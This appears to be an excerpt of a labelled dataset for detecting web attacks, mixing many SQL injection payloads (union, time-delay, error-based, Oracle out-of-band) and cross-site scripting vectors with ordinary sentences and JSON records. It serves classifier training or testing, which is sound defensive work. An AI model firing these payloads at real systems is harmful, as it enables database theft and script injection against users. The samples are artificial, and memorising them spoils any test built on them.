      ",1,XSS,4736 "-5516'+ ( select 'bmlv' where 7188 = 7188 union all select 7188,7188,7188,7188,7188,7188,7188,7188#",2,SQLi,14195 ,1,XSS,7446 XSS,1,XSS,9461 Select your preferred song.,3,normal,24450 "Use the checkboxes along the left side of Amazon's website to select only your iPhone model and narrow your search, or select a color material you like.",3,normal,25201 select ( case when ( 7997 = 1543 ) then 7997 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13579 "1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""tqbi"" = ""tqbi",2,SQLi,15893 "1"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,16807 XSS,1,XSS,8048 "1"" ) ) rlike sleep ( 5 ) #",2,SQLi,21007 "In 1849 Mr Charles Pearson, M.P., moved for a select committee to report upon the best means of securing some uniform system which should be at once punitive, reformatory and self-supporting.",3,normal,26024 ,1,XSS,5762 Select swap.,3,normal,24765 XSS,1,XSS,8525 "",1,XSS,3994 "1' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 'hllf' = 'hllf",2,SQLi,12303 1 ) as mpnj where 5049 = 5049,2,SQLi,20781 1 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17622 "{""id"":null,""firstName"":""Azahari"",""lastName"":""Ab Manap"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27582 I'm considering where to go for a cultural experience.,3,normal,23884 "",1,XSS,1568 "1%"" ) or sleep ( 5 ) #",2,SQLi,21522 "-5624' union all select 3723,3723,3723,3723,3723--",2,SQLi,18524 "test",1,XSS,9105 "
      drag me
      drop here
      ",1,XSS,1147 "",1,XSS,4516 "The oven was blazing, so the time came to select toppings.",3,normal,25404 1 ) and sleep ( 5 ) #,2,SQLi,21643 "1' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'rspz' = 'rspz",2,SQLi,10274 "select * from users where id = 1 or \<\ union select null,@@VERSION -- 1",2,SQLi,15939 "1"" ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""sjiz"" like ""sjiz",2,SQLi,12164 "admin"" or ""1"" = ""1""/*",2,SQLi,21577 "1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'sstt' = 'sstt",2,SQLi,10862 "{""id"":null,""firstName"":""James"",""lastName"":""Tang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26771 "
      ",1,XSS,1546 1' ) ) as mbzk where 9153 = 9153 and 2006 = 2006,2,SQLi,18674 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",2,SQLi,14952 "-1628"" union all select 9189,9189,9189,9189,9189,9189,9189,9189,9189--",2,SQLi,16200 "test",1,XSS,4513 "test",1,XSS,5669 ,1,XSS,3179 "1' where 5251 = 5251 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,11015 Where did you get that delicious dessert from?,3,normal,23859 <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>,1,XSS,1283 Filter the results.,3,normal,22826 "test",1,XSS,8287 "test",1,XSS,6177 -1602' or 3038 = 3038,2,SQLi,21651 ,1,XSS,2473 "1' ) where 6387 = 6387 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11482 1'+ ( select 'iqxn' where 1146 = 1146 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ) +',2,SQLi,10318 "test",1,XSS,5589 ,1,XSS,9663 "test",1,XSS,4468 -7951' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'blak' = 'blak,2,SQLi,10490 "test",1,XSS,6375 Fetch information where needed.,3,normal,23250 "{""id"":null,""firstName"":""Renee"",""lastName"":""Tan"",""address"":""721 Interstate 45 S"",""city"":""685"",""telephone"":""2437936156""}",3,normal,27080 "{""id"":null,""name"":""ShayminLand Forme""}",3,normal,27229 "-7069 ) union all select 6638,6638,6638,6638,6638,6638--",2,SQLi,17668 "test",1,XSS,6322 "",1,XSS,661 -1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A)),2,SQLi,18910 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--",2,SQLi,13368 1%' or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,18169 "1'|| ( select 'jpso' from dual where 9357 = 9357 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) ||'",2,SQLi,10933 "",1,XSS,3601 "test",1,XSS,5904 "1 ) as idvt where 3490 = 3490 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12465 "-4072%"" ) ) ) or 3999 = 1979",2,SQLi,20827 "1 ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 4858 = 4858",2,SQLi,13965 "test",1,XSS,4296 "1"" ) where 4660 = 4660 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12825 "-6360' ) as yfrk where 3683 = 3683 union all select 3683,3683,3683,3683,3683,3683,3683,3683,3683#",2,SQLi,14279 "1"" and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ""rntg"" like ""rntg",2,SQLi,12952 "-3393"" ) ) union all select 5954,5954,5954,5954,5954,5954,5954,5954,5954,5954--",2,SQLi,15287 "-4915' union all select 1928,1928,1928,1928#",2,SQLi,19135 "1%"" ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12000 Note: The additional savings is only good for select Prime members.,3,normal,25868 "test",1,XSS,4041 Select mature.,3,normal,24777 "But for the sake of practical convenience it has long been usual to select certain of the best marked of these passes to serve as limits within the range, whether to distinguish several great divisions from each other, or to further break up each of these great divisions into smaller groups.",3,normal,26317 "-6073"" ) ) ) or 9502 = 2012#",2,SQLi,20801 -2374 ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 2576 = 2576,2,SQLi,10702 "",1,XSS,3916 "Open the left navigation panel, select Settings, then select Flash Briefing.",3,normal,25815 select ( case when ( 8642 = 6049 ) then 1 else 8642* ( select 8642 from master..sysdatabases ) end ) --,2,SQLi,13974 1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( 'cmqe' like 'cmqe,2,SQLi,14970 "a"""" or 3=3--""",2,SQLi,22225 "select * from users where id = 1 or 1#""{ union select version ( ) ,version ( ) -- 1",2,SQLi,15015 "",1,XSS,2346 "test",1,XSS,3078 Randomly select a wedding theme.,3,normal,24394 "test",1,XSS,5607 "1"" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ""buzb"" = ""buzb",2,SQLi,10523 "1 ) where 2678 = 2678 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14966 XSS,1,XSS,6325 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,15004 or pg_sleep(5)--,2,SQLi,22125 This helps Dorita select the highest quality milk for her cheese.,3,normal,25304 "",1,XSS,7898 1' ) ) as sjzf where 9997 = 9997 and 4193 = 5408,2,SQLi,18723 "1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'ckfn' like 'ckfn",2,SQLi,13628 1' where 5060 = 5060,2,SQLi,21783 XSS,1,XSS,9044 "1' where 3425 = 3425 and elt ( 4249 = 4249,7259 ) --",2,SQLi,18222 "test",1,XSS,7531
      XSS
      ,1,XSS,7203 end and ( ( 'eqoc' like 'eqoc,2,SQLi,20695 -6813 ) ) ) or 6872 = 6872 and ( ( ( 7304 = 7304,2,SQLi,18733 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and '%' = '",2,SQLi,13679 1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'mmfq' = 'mmfq,2,SQLi,10186 """We evaluate to develop, not just to select players,"" Menard said.",3,normal,26451 -4410 where 5749 = 5749 or 1317 = 9823--,2,SQLi,19498 "",1,XSS,159 "test",1,XSS,4078 XSS,1,XSS,8383 "test",1,XSS,3579 drop,3,normal,23115 "-2178' ) ) ) or elt ( 3421 = 2899,2899 ) and ( ( ( 'jdst' = 'jdst",2,SQLi,16692 "test",1,XSS,6211 test",1,XSS,5632 "1%' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( '%' = '",2,SQLi,12388 1%' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and '%' = ',2,SQLi,16384 """)) waitfor delay '0:0:20' --",2,SQLi,20673 "-9941 union all select 1321,1321,1321,1321,1321,1321,1321#",2,SQLi,17366 ) or '1'='1'--,2,SQLi,22184 "test",1,XSS,7248 "test",1,XSS,8623 "{""id"":null,""firstName"":""Lang"",""lastName"":""Zhang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27315 "waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,20061 The Select Mini also works with both Mac and Windows computers.,3,normal,25354 "1"" ) as kdvb where 2651 = 2651 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,12499 "test",1,XSS,7884 1 ) where 6424 = 6424,2,SQLi,21668 "Cameron Forni, who created Select brand in 2015, will join Curaleaf as president of Select, after the deal closes.",3,normal,26299 "-9315' ) ) ) union all select 5057,5057,5057,5057,5057#",2,SQLi,17791 "test",1,XSS,7699 "1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'ejul' = 'ejul",2,SQLi,10575 "test",1,XSS,8868 "1' in boolean mode ) union all select null,null,null,null,null,null,null,null--",2,SQLi,15273 "-8735' ) ) union all select 3262,3262,3262--",2,SQLi,19132 Some adult individuals believe that a gift card means that you didn't care enough to select a special gift for them.,3,normal,25539 "1' ) ) as ydbt where 8062 = 8062 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12047 "{""id"":null,""name"":""Electrode""}",3,normal,26818 "test",1,XSS,2822 click,1,XSS,5836 "1' in boolean mode ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15024 1 ) ) union all select null--,2,SQLi,20738 document.vulnerable=true'); ?>,1,XSS,2793 "",1,XSS,390 "1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14648 "select * from users where id = 1 or \< = 1 union select 1,@@VERSION -- 1",2,SQLi,15928 "{""id"":null,""name"":""Growlithe""}",3,normal,27547 1' where 1628 = 1628,2,SQLi,21834 -6178 ) ) as lygb where 9559 = 9559 or ( 8459 = 8459 ) *4906--,2,SQLi,16985 "",1,XSS,1328 XSS,1,XSS,6900 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 'fnna' = 'fnna",2,SQLi,13057 "1%' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( '%' = '",2,SQLi,16183 "test",1,XSS,5896 "When Massachusetts was called upon to select for Statuary Hall in the capitol at Washington two figures from the long line of her worthies, she chose as her fittest representatives John Winthrop, the type of Puritanism and state-builder, and Samuel Adams (though here the choice was difficult between Samuel Adams and John Adams) as her greatest leader in the heroic period of the War of Independence.",3,normal,25158 "1)) or benchmark(10000000,MD5(1))#",2,SQLi,20121 "-5911 union all select 2245,2245,2245,2245,2245,2245#",2,SQLi,18104 top[/al/.source+/ert/.source](1),1,XSS,9440 "-9861' union all select 5710,5710,5710,5710,5710--",2,SQLi,18499 "",1,XSS,1652 "1%' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( '%' = '",2,SQLi,10897 "1 where 7906 = 7906 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14699 javascript:document.location='http://www.google.com/,1,XSS,5250 ORDER BY 29,2,SQLi,22387 """),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,15385 "",1,XSS,437 "1%' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( '%' = '",2,SQLi,12555 "1' ) as wpom where 2620 = 2620 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,16383 ,1,XSS,7433 1 ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 4694 = 4694,2,SQLi,9990 "",1,XSS,6544 pg_sleep ( __TIME__ ) --,2,SQLi,21179 XSS,1,XSS,6644 Select your impact.,3,normal,24879 <iframe src=http://ha.ckers.org/scriptlet.html>,1,XSS,2564 "1'|| ( select 'pzto' from dual where 7338 = 7338 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) ||'",2,SQLi,11692 Search for data where required.,3,normal,23469 Where's the airport?,3,normal,23501 Where's the villa?,3,normal,23572 "1' ) as wnyl where 8978 = 8978 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12441 "iif ( 5257 = 5257,1,1/0 )",2,SQLi,21131 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( 'vjdk' like 'vjdk",2,SQLi,13048 Find entries where necessary.,3,normal,23355 "1' where 4102 = 4102 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12809 "1 ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15523 ">

      ,1,XSS,7324 Select with precision.,3,normal,24447 "1' ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15744 XSS,1,XSS,8726 "However, select older model media players won't offer the app.",3,normal,26078 "1'+ ( select 'xqpe' where 4020 = 4020 union all select null,null--",2,SQLi,16628 I'll select my wedding shoes.,3,normal,24389 "test",1,XSS,6115 Select your team.,3,normal,24811 "-1171' union all select 3958,3958,3958,3958,3958--",2,SQLi,18439 "test",1,XSS,8386 -5769 ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13738 "1"" ) where 4382 = 4382 and 6607 = 2394--",2,SQLi,19545 Create memories.,3,normal,23022 "1'+ ( select 'uijv' where 7279 = 7279 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12487 1 ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18636 Dancer opened in select theaters in New York City on Sept.,3,normal,26252 "test",1,XSS,5030 "",1,XSS,6821 "1"" ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13077 I'm thinking of where to have our picnic.,3,normal,23978 "{""id"":null,""name"":""gray""}",3,normal,26937 "-8673"" ) or make_set ( 9354 = 9354,7185 ) and ( ""edap"" like ""edap",2,SQLi,16704 "1%' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and '%' = '",2,SQLi,13086 Select the best lens for capturing moments.,3,normal,24058 Where to add new data?,3,normal,23466 "1"" ) ) and 7533 = 7533 and ( ( ""rnni"" like ""rnni",2,SQLi,18676 ,1,XSS,5543 alert(1),1,XSS,9838 "-5198 ) ) ) union all select 7089,7089,7089,7089,7089,7089,7089,7089#",2,SQLi,16329 Fetch information where necessary.,3,normal,23360 I want to choose a painting for the living room.,3,normal,23717 "1"" where 8387 = 8387",2,SQLi,21854 1'|| ( select 'jmao' where 3009 = 3009,2,SQLi,19674 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--",2,SQLi,19252 "1"" ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""ksrh"" = ""ksrh",2,SQLi,11425 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11810 "select * from users where id = 1 or "" ( #"" or 1 = 1 -- 1",2,SQLi,17576 ,1,XSS,7330 Select expose.,3,normal,24695 "",1,XSS,2998 join,3,normal,23118 Delete spam.,3,normal,23047 "{""id"":null,""name"":""Guardromon (Gold)""}",3,normal,27493 XSS,1,XSS,7984 ,1,XSS,5736 "{""id"":null,""firstName"":""Feng"",""lastName"":""Sheng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26870 "
      test
      ",1,XSS,8512 "1"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11409 "-8331' ) union all select 1452,1452,1452,1452,1452--",2,SQLi,18215 "1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 )",2,SQLi,13625 Select your lose.,3,normal,25020 1'+ ( select gqez where 3704 = 3704,2,SQLi,20033 "1' ) where 7646 = 7646 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12919 I'm considering where to go for a jog.,3,normal,23673 1 ) ) waitfor delay '0:0:5' and ( ( 1636 = 1636,2,SQLi,18837 "
      drag me
      drop here
      ",1,XSS,1354 "test",1,XSS,3904 month,3,normal,23205 `'>,1,XSS,7064 XSS,1,XSS,9239 "
      drag me
      drop here",1,XSS,1098
      ,1,XSS,5807 Where's the art show?,3,normal,23584 create table myfile (input TEXT);,2,SQLi,20229 He turns to a press aide who will select the questioner.,3,normal,26116 "1"" ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,16815 "test",1,XSS,4556 "1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and '%' = '",2,SQLi,11296 javascript:alert(1),1,XSS,7813 "
      ",1,XSS,6559 "-9688%' ) ) ) or elt ( 3695 = 7995,7995 ) and ( ( ( '%' = '",2,SQLi,17251 "1"" ) as xwnu where 6490 = 6490 union all select null,null,null,null,null,null--",2,SQLi,15284 select sleep ( 5 ) and ( ( ( 'qjsc' = 'qjsc,2,SQLi,19208 "1'+ ( select kgon where 9014 = 9014 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ) +'",2,SQLi,10689 "test",1,XSS,3373 -9389' ) order by 1#,2,SQLi,21801 "test",1,XSS,4369 "1 ) as lfra where 2669 = 2669 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12233 "",1,XSS,4240 -3880 ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 5194 = 5194,2,SQLi,10022 Tinder Select has been around for almost six months at least.,3,normal,25288 "test",1,XSS,6834 "test",1,XSS,7520 "-7234"" ) union all select 3154,3154,3154,3154#",2,SQLi,18978 "1 ) where 6990 = 6990 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11491 "1' in boolean mode ) and elt ( 4249 = 4249,7259 ) #",2,SQLi,18300 )) RLIKE SLEEP(5) AND (('1337' LIKE '1337,2,SQLi,19344 "-8432 ) union all select 8169,8169,8169,8169,8169,8169,8169,8169,8169,8169--",2,SQLi,15502 1 ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 3505 = 3505,2,SQLi,10503 end and ( 'hmtt' like 'hmtt,2,SQLi,20896 "1 ) ) ) union all select null,null,null,null,null#",2,SQLi,18516 "select * from users where id = 1.<1# union select 1,version ( ) -- 1",2,SQLi,16366 XSS</plaintext>,1,XSS,5763 Select the ideal candidate.,3,normal,24298 "1%"" ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11664 "<?xml version=""1.0""?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>",1,XSS,550 "-8588' union all select 2135,2135--",2,SQLi,20051 1' ) as pudv where 2609 = 2609,2,SQLi,20552 "1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'vrim' = 'vrim",2,SQLi,17700 "{""id"":null,""firstName"":""Donavan"",""lastName"":""Chang"",""address"":""38062 E Main St"",""city"":""489"",""telephone"":""4123364633""}",3,normal,27042 "1"" ) where 9223 = 9223 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11976 "For this reason, select toys that don't have small parts that may be swallowed.",3,normal,26174 \&quot;;alert(&apos;XSS&apos;);//,1,XSS,9322 "<listing onpaste=""alert(1)"" contenteditable>test</listing>",1,XSS,3946 "As Jennings and Wlezien put it: [I]n presidential elections voters select an individual to represent the country, whereas in parliamentary elections they select a legislature, which in turn produces a government.",3,normal,26353 "<footer onkeyup=""alert(1)"" contenteditable>test</footer>",1,XSS,4310 "His knowledge of the ancient authors was wide, but his taste was not select, and his erudition was superficial.",3,normal,26101 "1' ) where 2443 = 2443 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11717 "1"" where 9342 = 9342 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,12976 "<optgroup onmouseover=""alert(1)"">test</optgroup>",1,XSS,5871 "In the new window that opens, select the ""View"" tab.",3,normal,25998 Where's your SQL information?,3,normal,23418 "1' ) as bdei where 9531 = 9531 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12551 1 ) as eryo where 2531 = 2531 rlike sleep ( 5 ) --,2,SQLi,18486 "1' ) as vlwh where 9403 = 9403 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16520 "<style>@keyframes slidein {}</style><hr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hr>",1,XSS,450 Insert ink.,3,normal,22816 "1' in boolean mode ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11233 "select * from users where id = 1 or "". ( "" or 1 = 1 -- 1",2,SQLi,17571 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--",2,SQLi,14465 "select * from users where id = 1 or ""? ( "" or 1 = 1 -- 1",2,SQLi,17570 "1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'nbsr' like 'nbsr",2,SQLi,13790 <a onpointerover=alert(1)>XSS</a>,1,XSS,9367 <svg><colgroup onload=alert(1)></colgroup>,1,XSS,7538 I need to decide where to plant new flowers.,3,normal,23684 "document.getElementsByClassName("""").length",1,XSS,7368 Stearns and Foster: Up to $600 off select mattresses and frames,3,normal,25526 "<style>:target {color:red;}</style><title id=x style=""transition:color 1s"" ontransitionend=alert(1)></title>",1,XSS,1129 Where's your SQL input?,3,normal,23423 "<iframe srcdoc=""<img src=1 onerror=alert(1)>""></iframe>",1,XSS,4409 <xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>,1,XSS,1801 select ( case when ( 5152 = 7853 ) then 5152 else 5152* ( select 5152 from mysql.db ) end ) #,2,SQLi,14531 "1'+ ( select vohg where 6383 = 6383 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) +'",2,SQLi,10113 """,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23",2,SQLi,14953 <dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus>,1,XSS,2389 "<listing draggable=""true"" ondragenter=""alert(1)"">test</listing>",1,XSS,3036 -6039%' ) ) or 6872 = 6872 and ( ( 